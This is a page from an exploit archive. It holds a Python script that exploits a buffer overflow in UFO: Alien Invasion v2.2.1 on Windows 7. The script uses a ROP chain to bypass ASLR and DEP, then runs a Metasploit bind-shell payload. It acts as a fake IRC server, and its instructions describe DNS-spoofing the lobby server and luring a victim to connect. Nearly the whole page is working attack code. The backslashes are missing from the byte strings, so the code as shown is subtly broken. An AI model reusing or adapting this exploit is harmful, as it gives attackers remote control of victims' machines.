[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : UFO: Alien Invasion v2.2.1 BoF Exploit (Win7 ASLR and DEP Bypass)
# Published : 2010-07-05
# Author : Node
# Previous Title : Registry OCX v1.5 ActiveX Buffer Overflow Exploit
# Next Title : minerCPP 0.4b Remote BOF+Format String Attack Exploit
#!/usr/bin/python
#
# Exploit Title: UFO: Alien Invasion v2.2.1 BoF Exploit (Win7 ASLR and DEP Bypass)
# Date: July 5, 2010
# Author: Node
# Software Link: http://sourceforge.net/projects/ufoai/files/UFO_AI%202.x/2.2.1/ufoai-2.2.1-win32.exe/download
# Version: "UFO: Alien Invasion 2.2.1 x86 Apr 28 2008 Win32 RELEASE"
# Tested on: Windows 7 Ultimate x64 ENG
# CVE :
# Max shellcode size: 328 bytes
# Badchars: 'x00x0ax0d'
# Instructions: 1. DNS spoof/redirect "irc.freenode.org" to your ip
# 2- Have your victim click "Multiplayer" and then "Lobby"
#
# Notes: There is a possibility that this exploit can work on a different
# windows version, by just changing the last bytes of 0xffff34ec
# to wherever VirtualProtect() resides in that version of kernel32.dll.
import sys, socket
#msfpayload windows/meterpreter/bind_tcp LPORT=4444 R | msfencode -b 'x00x0ax0d' -t c
#[*] x86/shikata_ga_nai succeeded with size 326 (iteration=1)
shellcode = ("xbfxb7x89xfex0exdaxd3xd9x74x24xf4x2bxc9xb1x4b" +
"x5ex83xc6x04x31x7ex11x03x7ex11xe2x42x75x16x87" +
"xacx86xe7xf8x25x63xd6x2ax51xe7x4bxfbx12xa5x67" +
"x70x76x5exf3xf4x5ex51xb4xb3xb8x5cx45x72x04x32" +
"x85x14xf8x49xdaxf6xc1x81x2fxf6x06xffxc0xaaxdf" +
"x8bx73x5bx54xc9x4fx5axbax45xefx24xbfx9ax84x9e" +
"xbexcax35x94x88xf2x3exf2x28x02x92xe0x14x4dx9f" +
"xd3xefx4cx49x2ax10x7fxb5xe1x2fx4fx38xfbx68x68" +
"xa3x8ex82x8ax5ex89x51xf0x84x1cx47x52x4ex86xa3" +
"x62x83x51x20x68x68x15x6ex6dx6fxfax05x89xe4xfd" +
"xc9x1bxbexd9xcdx40x64x43x54x2dxcbx7cx86x89xb4" +
"xd8xcdx38xa0x5bx8cx54x05x56x2exa5x01xe1x5dx97" +
"x8ex59xc9x9bx47x44x0exdbx7dx30x80x22x7ex41x89" +
"xe0x2ax11xa1xc1x52xfax31xedx86xadx61x41x79x0e" +
"xd1x21x29xe6x3bxaex16x16x44x64x3fxe6x61xd4x28" +
"x0bx95xcaxf4x82x73x86x14xc3x2cx3fxd7x30xe5xd8" +
"x28x13x5ax70xbfx2bxb5x46xc0xabx90xe4x6dx03x72" +
"x7fx7ex90x63x80xabxb0xf4x17x21x51xb7x86x36x78" +
"x2dx49xa3x87xe7x1ex5bx8axdex69xc4x75x35xe2xcd" +
"xe3xf5x9dx31xe4xf5x5dx64x6exf5x35xd0xcaxa6x20" +
"x1fxc7xdbxf8x8axe8x8dxadx1dx81x33x8bx6ax0excc" +
"xfex6ax72x1bxc7xe8x82x2ex2bx31x60")
#start
rop = "x5axc9x70x61" #0x6170C95A : PUSH ESP # POP EBX # POP EBP
rop += "A"*4
rop += "xd6x14x6cx68" #0x686C14D6 : ADD ESP,1C
rop += "1111" #VirtualProtect placeholder
rop += "2222" #return address placeholder
rop += "3333" #lpAddress placeholder
rop += "4444" #dwsize placeholder
rop += "5555" #flNewProtect placeholder
rop += "x05xe0x76x61" #0x6176e005 lpflOldProtect writable in SDL_mixer.dll
rop += "A"*4
rop += "x45x57x10x68" #0x68105745 : MOV EAX,EBX # POP EBX # POP EBP
rop += "A"*8
rop += "xddx5bx10x68" #0x68105BDD : MOV EDX,EAX # MOV EAX,EDX
rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX
rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX
rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX
rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX
rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX
rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX
rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX
rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX
#grabbing kernel32
rop += "xb8x51x58x67" #0x675851B8 : MOV EAX,200
rop += "x71x33x6cx68" #0x686C3371 : MOV ECX,EAX # MOV EAX,ECX
rop += "xe3xf9x71x61" #0x6171F9E3 : ADD ECX,ECX
rop += "xe3xf9x71x61" #0x6171F9E3 : ADD ECX,ECX
rop += "x53x23x10x68" #0x68102353 : XOR EAX,EAX
rop += "x50x49x58x67" #0x67584950 : ADD EAX,20
rop += "x50x49x58x67" #0x67584950 : ADD EAX,20
rop += "x50x49x58x67" #0x67584950 : ADD EAX,20
rop += "x50x49x58x67" #0x67584950 : ADD EAX,20
rop += "x50x49x58x67" #0x67584950 : ADD EAX,20 A0
rop += "x6bx8cx13x68" #0x68138C6B : XCHG EAX,EBP
rop += "x25x54x72x61" #0x61725425 : ADD ECX,EBP
rop += "x6bx8cx13x68" #0x68138C6B : XCHG EAX,EBP
rop += "x50x49x58x67" #0x67584950 : ADD EAX,20
rop += "x50x49x58x67" #0x67584950 : ADD EAX,20
rop += "x50x49x58x67" #0x67584950 : ADD EAX,20
rop += "x6bx8cx13x68" #0x68138C6B : XCHG EAX,EBP
rop += "x25x54x72x61" #0x61725425 : ADD ECX,EBP 9a0
rop += "x73x33x6cx68" #0x686C3373 : MOV EAX,ECX
rop += "x6bx8cx13x68" #0x68138C6B : XCHG EAX,EBP
rop += "x28x51x58x67" #0x67585128 : MOV EAX,2
rop += "x71x33x6cx68" #0x686C3371 : MOV ECX,EAX # MOV EAX,ECX
rop += "xe3xf9x71x61" #0x6171F9E3 : ADD ECX,ECX
rop += "xe3xf9x71x61" #0x6171F9E3 : ADD ECX,ECX
rop += "xe3xf9x71x61" #0x6171F9E3 : ADD ECX,ECX
rop += "x6bx8cx13x68" #0x68138C6B : XCHG EAX,EBP
rop += "x6fx9fx58x67" #0x67589F6F : ADD ECX,EAX # MOVZX EAX,CX
rop += "x9cx8dx59x67" #0x67598D9C : POP ECX
rop += "x05xe0x76x61" #0x6176e005 : writable
rop += "xeex9bx71x61" #0x61719BEE : MOV EBX,EDX # SUB EBX,EAX # MOV EAX,EBX # MOV WORD PTR DS:[ECX+44],AX # ADD ESP,4 # POP EBX # POP EBP
rop += "A"*4
rop += "A"*4
rop += "A"*4
rop += "x67x01x11x68" #0x68110167 : MOV EAX,DWORD PTR DS:[EAX]
#VirtualProtect()
rop += "x71x33x6cx68" #0x686C3371 : # MOV ECX,EAX # MOV EAX,ECX
rop += "x5axc9x70x61" #0x6170C95A : {POP} # PUSH ESP # POP EBX # POP EBP
rop += "A"*4
rop += "x53x23x10x68" #0x68102353 : # XOR EAX,EAX
rop += "x50x49x58x67" #0x67584950 : # ADD EAX,20
rop += "x50x49x58x67" #0x67584950 : # ADD EAX,20
rop += "x50x49x58x67" #0x67584950 : # ADD EAX,20
rop += "x6bx8cx13x68" #0x68138C6B : # XCHG EAX,EBP
rop += "x6ax1fx13x68" #0x68131F6A : # ADD EBP,EBX
rop += "x73x33x6cx68" #0x686C3373 : # MOV EAX,ECX
rop += "x6bx8cx13x68" #0x68138C6B : # XCHG EAX,EBP
rop += "x71x33x6cx68" #0x686C3371 : # MOV ECX,EAX # MOV EAX,ECX
rop += "x6bx8cx13x68" #0x68138C6B : # XCHG EAX,EBP
rop += "xe2x13x6cx68" #0x686C13E2 : # POP EBX
rop += "xecx34xffxff" #VirtualProtect() is found at 0x????34ec, if not, change this to match your windows version
rop += "x42x35x80x70" #0x70803542 : # XOR AL,AL # POP EBP
rop += "A"*4
rop += "x02x4dx6dx68" #0x686D4D02 : # ADD AL,BL
rop += "x6bx8cx13x68" #0x68138C6B : # XCHG EAX,EBP
rop += "x73x33x6cx68" #0x686C3373 : # MOV EAX,ECX
rop += "x6bx8cx13x68" #0x68138C6B : # XCHG EAX,EBP
rop += "x71x33x6cx68" #0x686C3371 : # MOV ECX,EAX # MOV EAX,ECX
rop += "x34xa5x70x61" #0x6170A534 : # MOV CH,BH # ADD AL,BYTE PTR DS:[EAX] # MOV ESP,EBP # POP EBP
rop += "A"*4
rop += "A"*4
rop += "A"*4
rop += "A"*4
rop += "xb9x4bx58x67" #0x67584BB9 : MOV DWORD PTR DS:[EDX],ECX
#fetch shellcode
rop += "x5axc9x70x61" #0x6170C95A : {POP} # PUSH ESP # POP EBX # POP EBP
rop += "A"*4
rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX
rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX
rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX
rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX
rop += "x45x57x10x68" #0x68105745 : {POP} # MOV EAX,EBX # POP EBX # POP EBP
rop += "A"*4
rop += "A"*4
rop += "x6bx8cx13x68" #0x68138C6B : XCHG EAX,EBP
rop += "x53x23x10x68" #0x68102353 : XOR EAX,EAX
rop += "xe2x13x6cx68" #0x686C13E2 : # POP EBX
rop += "xacxffxffxff" #0xac * 2 = 0x158
rop += "x02x4dx6dx68" #0x686D4D02 : # ADD AL,BL
rop += "x71x33x6cx68" #0x686C3371 : MOV ECX,EAX # MOV EAX,ECX
rop += "xe3xf9x71x61" #0x6171F9E3 : ADD ECX,ECX
rop += "x73x33x6cx68" #0x686C3373 : MOV EAX,ECX
rop += "x6bx8cx13x68" #0x68138C6B : XCHG EAX,EBP
rop += "x6fx9fx58x67" #0x67589F6F : ADD ECX,EAX # MOVZX EAX,CX shellcode
rop += "xb9x4bx58x67" #0x67584BB9 : # MOV DWORD PTR DS:[EDX],ECX
#again
rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX
rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX
rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX
rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX
rop += "x73x33x6cx68" #0x686C3373 : MOV EAX,ECX
rop += "x26x51x58x67" #0x67585126 : MOV DWORD PTR DS:[EDX],EAX # MOV EAX,2
#set dwsize 0x148 (328)
rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX
rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX
rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX
rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX
rop += "x53x23x10x68" #0x68102353 : XOR EAX,EAX
rop += "xe2x13x6cx68" #0x686C13E2 : # POP EBX
rop += "xa4xffxffxff" #0xa4 * 2 = 0x148 (328)
rop += "x02x4dx6dx68" #0x686D4D02 : # ADD AL,BL
rop += "x71x33x6cx68" #0x686C3371 : MOV ECX,EAX # MOV EAX,ECX
rop += "xe3xf9x71x61" #0x6171F9E3 : ADD ECX,ECX
rop += "x73x33x6cx68" #0x686C3373 : MOV EAX,ECX
rop += "x26x51x58x67" #0x67585126 : MOV DWORD PTR DS:[EDX],EAX # MOV EAX,2
#forwardjump
rop += "x53x23x10x68" #0x68102353 : XOR EAX,EAX
rop += "xe2x13x6cx68" #0x686C13E2 : # POP EBX
rop += "x70xffxffxff" # 0x70
rop += "x02x4dx6dx68" #0x686D4D02 : # ADD AL,BL
rop += "x5axc9x70x61" #0x6170C95A : {POP} # PUSH ESP # POP EBX # POP EBP
rop += "A"*4
rop += "x6bx8cx13x68" #0x68138C6B : XCHG EAX,EBP
rop += "x6ax1fx13x68" #0x68131F6A : # ADD EBP,EBX
rop += "xc6xcdx6dx68" #0x686DCDC6 : # LEAVE
rop += "A"*4
#backjump
rop2 = "x5axc9x70x61" #0x6170C95A : {POP} # PUSH ESP # POP EBX # POP EBP
rop2 += "A"*4
rop2 += "x45x57x10x68" #0x68105745 : {POP} # MOV EAX,EBX # POP EBX # POP EBP
rop2 += "A"*4
rop2 += "A"*4
rop2 += "xddx5bx10x68" #0x68105BDD : MOV EDX,EAX # MOV EAX,EDX
rop2 += "xb8x51x58x67" #0x675851B8 : MOV EAX,200
rop2 += "x50x49x58x67" #0x67584950 : ADD EAX,20
rop2 += "xe2x13x6cx68" #0x686C13E2 : # POP EBX
rop2 += "x0cxffxffxff" # 12
rop2 += "x02x4dx6dx68" #0x686D4D02 : # ADD AL,BL
rop2 += "x9cx8dx59x67" #0x67598D9C : POP ECX
rop2 += "x05xe0x76x61" #0x6176e005 : writable
rop2 += "xeex9bx71x61" #0x61719BEE : MOV EBX,EDX # SUB EBX,EAX # MOV EAX,EBX # MOV WORD PTR DS:[ECX+44],AX # ADD ESP,4 # POP EBX # POP EBP
rop2 += "A"*4
rop2 += "A"*4
rop2 += "A"*4
rop2 += "x7ax36x13x68" #0x6813367A : XCHG EAX,ESP
#set flNewProtect 0x40 (land here)
rop2 += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX
rop2 += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX
rop2 += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX
rop2 += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX
rop2 += "x53x23x10x68" #0x68102353 : XOR EAX,EAX
rop2 += "x50x49x58x67" #0x67584950 : ADD EAX,20
rop2 += "x50x49x58x67" #0x67584950 : ADD EAX,20
rop2 += "x26x51x58x67" #0x67585126 : MOV DWORD PTR DS:[EDX],EAX # MOV EAX,2
#ending
rop2 += "x71x33x6cx68" #0x686C3371 : MOV ECX,EAX # MOV EAX,ECX
rop2 += "xe3xf9x71x61" #0x6171F9E3 : ADD ECX,ECX
rop2 += "xe3xf9x71x61" #0x6171F9E3 : ADD ECX,ECX
rop2 += "xe3xf9x71x61" #0x6171F9E3 : ADD ECX,ECX
rop2 += "x73x33x6cx68" #0x686C3373 : MOV EAX,ECX
rop2 += "x52x3dx13x68" #0x68133D52 : SUB EDX,EAX # MOV EAX,EDX
rop2 += "x7ax36x13x68" #0x6813367A : XCHG EAX,ESP
end = "x0dx0a"
sploit = "001 :"
sploit += rop
sploit += "x90" * (552 - len(rop))
sploit += rop2
sploit += shellcode
sploit += end
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 6667))
s.listen(1)
print ("[*] Listening on port 6667.")
print ("[*] Have someone connect to you.")
print ("[*] Type <control>-c to exit.")
conn, addr = s.accept()
print '[*] Received connection from: ', addr
conn.send(sploit)
conn.close